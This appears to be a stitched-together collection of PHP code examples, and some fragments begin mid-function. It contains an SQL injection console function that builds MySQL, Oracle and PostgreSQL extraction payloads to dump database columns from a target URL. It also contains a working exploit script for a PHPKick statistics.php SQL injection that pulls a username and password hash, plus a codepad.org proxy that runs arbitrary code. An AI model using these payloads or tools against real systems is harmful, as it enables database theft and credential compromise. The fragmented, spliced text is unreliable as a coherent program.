Example #1
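function frame6()
{
    // "Dump column data" screen of the injection console.
    //
    // Reads the operator's form (POST): `url` (injection point), `lol`
    // (1-based index into the per-technique query-template lists $a/$b/$c/$d),
    // `sobras` (suffix appended after the payload), `database`, `tn` (table),
    // `nombre[]` (column names) and `datos` (technique selector). For every
    // column it first asks the target for the row count, then pulls the column
    // one row per request and renders the values as an HTML table. Output goes
    // straight to the response; nothing is returned.
    //
    // Trust boundary: everything in $_POST is operator-controlled, and every
    // byte extracted from the target is hostile by definition — it is
    // HTML-escaped before rendering so a booby-trapped target cannot inject
    // markup/script into the operator's browser.
    html_header();
    global $a, $payload_error, $b, $payload_union, $c, $payload_oracle, $d, $payload_postgre;

    if (!isset($_POST['datos']) || !is_string($_POST['datos'])) {
        return;
    }
    if (!isset($_POST['nombre']) || !is_array($_POST['nombre'])) {
        return;
    }

    $url = isset($_POST['url']) ? $_POST['url'] : '';
    $sobras = isset($_POST['sobras']) ? $_POST['sobras'] : '';
    $database = isset($_POST['database']) ? $_POST['database'] : '';
    $tabla = isset($_POST['tn']) ? $_POST['tn'] : '';

    // Validate the template index before arithmetic and indexing: a
    // non-numeric value throws in PHP 8 ("abc" - 1) and an out-of-range one
    // left $query null, turning every request into a bare $url.$sobras fetch.
    $vuln_index = filter_var(isset($_POST['lol']) ? $_POST['lol'] : null, FILTER_VALIDATE_INT);
    if ($vuln_index === false) {
        echo "<p>Invalid injection index.</p>";
        return;
    }

    // Technique selector -> [mode, template list, placeholder to substitute].
    // An unrecognised selector used to leave $mode/$queryn unset and the dump
    // loop still fired one request at $url.$sobras; now it is rejected.
    $techniques = array(
        'data e-b'  => array('mysql_error',   $a, $payload_error),
        'data u-q'  => array('mysql_union',   $b, $payload_union),
        'data o-eb' => array('oracle_error',  $c, $payload_oracle),
        'data pg'   => array('postgre_error', $d, $payload_postgre),
    );
    $datos = $_POST['datos'];
    if (!isset($techniques[$datos])) {
        echo "<p>Unknown extraction mode.</p>";
        return;
    }
    list($mode, $templates, $placeholder) = $techniques[$datos];
    $placeholder = (string) $placeholder;
    if (!is_array($templates) || !isset($templates[$vuln_index - 1])) {
        echo "<p>No query template for index {$vuln_index}.</p>";
        return;
    }
    $template = $templates[$vuln_index - 1];

    foreach ($_POST['nombre'] as $nombres) {
        echo "<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" style=\"display: inline-block;vertical-align: top;\"><tr>";
        // NOTE(review): asciiEncode() is defined elsewhere; it is also used to
        // build the URL payloads below, so its output is assumed to be
        // markup-safe here — confirm before relying on it for the header cell.
        echo "<td>" . asciiEncode($nombres) . "</td>";
        echo "</tr>";

        // $countQuery asks the target for the number of rows; $rowQuery fetches
        // one row, with the literal text "$i" substituted per iteration.
        // $firstRow is the index of the first row for the technique's paging
        // construct (LIMIT/OFFSET are 0-based, Oracle's ROWNUM is 1-based).
        // NOTE(review): the Oracle payloads pass $database raw while the MySQL
        // ones run it through asciiEncode() — kept as in the original, verify.
        switch ($mode) {
            case 'mysql_error':
                $countQuery = str_replace($placeholder, "(SELECT%207656%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20)),1,50)%20FROM%20" . asciiEncode($database) . "." . $tabla . "),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)", $template);
                $rowQuery = str_replace($placeholder, '(SELECT%206968%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(' . asciiEncode($nombres) . '%20AS%20CHAR),0x20)),1,50)%20FROM%20' . asciiEncode($database) . '.' . $tabla . '%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)', $template);
                $firstRow = 0;
                break;
            case 'mysql_union':
                $countQuery = str_replace($placeholder, "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20),0x3a70687a3a)", $template);
                $countQuery = str_replace("%23", "%20FROM%20" . asciiEncode($database) . "." . $tabla . "%23", $countQuery);
                $rowQuery = str_replace($placeholder, '(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(' . asciiEncode($nombres) . '%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20' . asciiEncode($database) . '.' . $tabla . '%20LIMIT%20$i,1)', $template);
                $firstRow = 0;
                break;
            case 'oracle_error':
                $countQuery = str_replace($placeholder, "(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20COUNT(" . asciiEncode($nombres) . ")%20FROM%20" . $database . "." . $tabla . ")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))", $template);
                $rowQuery = str_replace($placeholder, '(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(' . asciiEncode($nombres) . '%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20' . asciiEncode($nombres) . '%2CROWNUM%20AS%20LIMIT%20FROM%20' . $database . '.' . $tabla . '%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))', $template);
                // ROWNUM starts at 1: the old 0-based loop requested LIMIT=0
                // (no row) first and never reached the last row.
                $firstRow = 1;
                break;
            default: // 'postgre_error'
                $countQuery = str_replace($placeholder, "(SELECT%20COALESCE(CAST(COUNT(%2A)%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public." . $tabla . ")", $template);
                $rowQuery = str_replace($placeholder, '(SELECT%20COALESCE(CAST(' . asciiEncode($nombres) . '%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public.' . $tabla . '%20OFFSET%20$i%20LIMIT%201)', $template);
                $firstRow = 0;
                break;
        }

        // One request for the row count, then one request per row. A
        // non-numeric count (target did not answer as expected) yields 0 rows
        // instead of a PHP 8 TypeError from "abc" - 1.
        $rows = (int) GetBetween(get_url($url . $countQuery . $sobras));
        for ($i = $firstRow; $i < $firstRow + $rows; $i++) {
            $fetch = str_replace('$i', (string) $i, $rowQuery);
            $valor = GetBetween(get_url($url . $fetch . $sobras));
            // Target-supplied data: escape it, never render it as markup.
            echo "<tr><td>" . htmlspecialchars((string) $valor, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "</td></tr>";
        }
        echo "</table>";
    }
}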
    $spos = strpos($host, "http://");
    if (!is_int($spos) && $spos == 0) {
        $host = "http://{$host}";
    }
    if (!$host == "http://localhost") {
        $spos = strpos($host, "http://www.");
        if (!is_int($spos) && $spos == 0) {
            $host = "http://www.{$host}";
        }
    }
    $exploit = "statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";
    echo "exploiting...\n";
    $source = file_get_contents($host . $path . $exploit);
    $username = GetBetween($source, " :<br>", ":");
    echo "username: {$username}\n";
    $hash = GetBetween($source, "<br>{$username}:", "</td>");
    echo "hash: {$hash}\n";
} else {
    echo "\n\n";
    echo "|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
    echo "|                                                                            |\n";
    echo "|Syntax: php " . $_SERVER['argv'][0] . " [host] [path]                                       |\n";
    echo "|                                                                            |\n";
    echo "|Example: php " . $_SERVER['argv'][0] . " http://www.domain.com /path/                       |\n";
    echo "|                                                                            |\n";
    echo "|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo "|      (magic_quotes, register_globals).This exploit is only for educational |\n";
    echo "|      use, use it on your own risk! Exploiting scripts without permission of|\n";
    echo "|      the owner of the webspace is illegal!                                 |\n";
    echo "|      I'm not responsible for any resulting damage                          |\n";
    echo "|                                                                            |\n";
Example #3
<?php

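// Thin web front-end for codepad.org: takes `code` and `lang` from the query
// string, submits them to codepad with "run" enabled and prints the program's
// output with codepad's markup stripped. Any caller can execute arbitrary code
// on codepad through this endpoint, so at minimum refuse requests that do not
// carry both parameters with a known language, and do not hang on upstream.
$code = isset($_GET['code']) ? $_GET['code'] : null;
$lang = isset($_GET['lang']) ? $_GET['lang'] : null;
$languages = array('c' => 'C', 'c++' => 'C++', 'd' => 'D', 'haskell' => 'Haskell', 'lua' => 'Lua', 'ocaml' => 'OCaml', 'php' => 'PHP', 'perl' => 'Perl', 'python' => 'Python', 'ruby' => 'Ruby', 'scheme' => 'Scheme', 'tcl' => 'Tcl', '2' => 'C++');
if (!is_string($code) || !is_string($lang) || !isset($languages[strtolower($lang)])) {
    // Previously an unknown language was sent upstream as lang=NULL (and PHP
    // 8.1+ deprecates strtolower(null)); fail early instead.
    http_response_code(400);
    echo 'Missing or unsupported "code"/"lang" parameter.';
    exit;
}
$url = 'http://codepad.org';
// NOTE(review): the field is spelt 'privite' in the original; if codepad's form
// expects 'private' the paste is being published — verify against the form.
$data = array('code' => $code, 'lang' => $languages[strtolower($lang)], 'submit' => 'Submit', 'run' => "True", 'privite' => "True");
// use key 'http' even if you send the request to https://...
// Explicit timeout so a slow upstream does not tie the worker up for
// default_socket_timeout.
$options = array('http' => array('header' => "Content-type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data), 'timeout' => 30));
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
if ($result === false) {
    http_response_code(502);
    echo 'codepad.org did not answer.';
    exit;
}
// Narrow first to the "output" panel, then to the cell holding the program's
// stdout. strip_tags() removes codepad's markup but is not an HTML escape; the
// remaining text is echoed as-is, which is what the original did.
$data = GetBetween('<a name="output">', '</td></tr></tbody></table>', $result);
echo strip_tags(GetBetween('<td width="100%" style="vertical-align: top">', '</td>', $data));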
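/**
 * Return the text of $pool between the first occurrence of $var1 and the
 * next occurrence of $var2 after it.
 *
 * @param string $var1 start marker; empty means "from the beginning"
 * @param string $var2 end marker; empty or absent means "to the end"
 * @param string $pool haystack (false/null from a failed fetch is treated as "")
 * @return string      the slice, or "" when the start marker is not found
 *
 * Fixes over the original: a missing start marker no longer produces a
 * slice at offset strlen($var1) (strpos() false silently became 0), an end
 * marker found at position 0 now yields "" instead of the whole remainder
 * (`== 0` conflated false with 0), and the optional-before-required parameter
 * list (deprecated in PHP 8.0) is gone — all three arguments were already
 * mandatory in practice.
 */
function GetBetween($var1, $var2, $pool)
{
    $pool = (string) $pool;
    $var1 = (string) $var1;
    $var2 = (string) $var2;

    $start = 0;
    if ($var1 !== '') {
        $pos = strpos($pool, $var1);
        if ($pos === false) {
            return '';
        }
        $start = $pos + strlen($var1);
    }
    $rest = substr($pool, $start);

    if ($var2 === '') {
        return $rest;
    }
    $end = strpos($rest, $var2);
    if ($end === false) {
        return $rest;
    }
    return substr($rest, 0, $end);
}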